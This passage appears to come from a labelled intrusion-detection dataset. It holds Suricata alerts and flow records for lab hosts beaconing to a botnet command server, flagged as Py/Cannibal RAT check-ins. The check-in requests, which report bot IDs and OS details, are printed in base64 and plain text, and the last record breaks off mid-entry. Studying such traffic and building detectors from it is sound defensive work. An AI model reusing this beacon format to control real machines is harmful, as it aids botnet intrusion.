[{'timestamp': '2017-07-07T13:10:31.871612+0000', 'flow_id': 853167474953481, 'pcap_cnt': 4076597, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52179, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:31.806153+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobetAAIAGTzXAqAoPza6lScvTH5CF3OeIJOYEXFARAQDvGAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:31.871612+0000', 'flow_id': 853167474953481, 'pcap_cnt': 4076597, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52179, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:31.806153+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobetAAIAGTzXAqAoPza6lScvTH5CF3OeIJOYEXFARAQDvGAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,692
192.168.10.15-52180-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4077815, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:41
87,012
Friday
[{'timestamp': '2017-07-07T13:10:41.955016+0000', 'flow_id': 690933675933930, 'pcap_cnt': 4077815, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52180, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:41.868586+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobfBAAIAGTzDAqAoPza6lScvUH5CUyVQdTv2RylARAQC8EAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:41.955016+0000', 'flow_id': 690933675933930, 'pcap_cnt': 4077815, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52180, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:41.868586+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobfBAAIAGTzDAqAoPza6lScvUH5CUyVQdTv2RylARAQC8EAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,734
192.168.10.15-52181-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4082534, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:51
66,667
Friday
[{'timestamp': '2017-07-07T13:10:52.012935+0000', 'flow_id': 1527696385077957, 'pcap_cnt': 4082534, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52181, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:51.946885+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobfVAAIAGTyvAqAoPza6lScvVH5Ab6jvH5vZMM1ARAQD64gAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:52.012935+0000', 'flow_id': 1527696385077957, 'pcap_cnt': 4082534, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52181, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:51.946885+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobfVAAIAGTyvAqAoPza6lScvVH5Ab6jvH5vZMM1ARAQD64gAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,238,025
192.168.10.9-2106-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4110159, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:11:36
79,525
Friday
[{'timestamp': '2017-07-07T13:11:36.079769+0000', 'flow_id': 2153400108581762, 'pcap_cnt': 4110159, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2106, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:11:36.000898+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoB/ZAAIAGtTDAqAoJza6lSQg6H5A0VnlCRwuaP1ARAQC6fAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:11:36.079769+0000', 'flow_id': 2153400108581762, 'pcap_cnt': 4110159, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2106, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:11:36.000898+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoB/ZAAIAGtTDAqAoJza6lSQg6H5A0VnlCRwuaP1ARAQC6fAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,238,804
192.168.10.15-52198-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4118299, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:12:07
74,935
Friday
[{'timestamp': '2017-07-07T13:12:07.787769+0000', 'flow_id': 780496634634986, 'pcap_cnt': 4118299, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52198, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:12:07.713450+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobfpAAIAGTybAqAoPza6lScvmH5BRtl/pml004lARAQAEzgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:12:07.787769+0000', 'flow_id': 780496634634986, 'pcap_cnt': 4118299, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52198, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:12:07.713450+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobfpAAIAGTybAqAoPza6lScvmH5BRtl/pml004lARAQAEzgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,238,934
192.168.10.15-52199-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4120377, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:12:32
69,150
Friday
[{'timestamp': '2017-07-07T13:12:32.079060+0000', 'flow_id': 769535879686552, 'pcap_cnt': 4120377, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52199, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:12:32.010648+0000'}, 'payload': 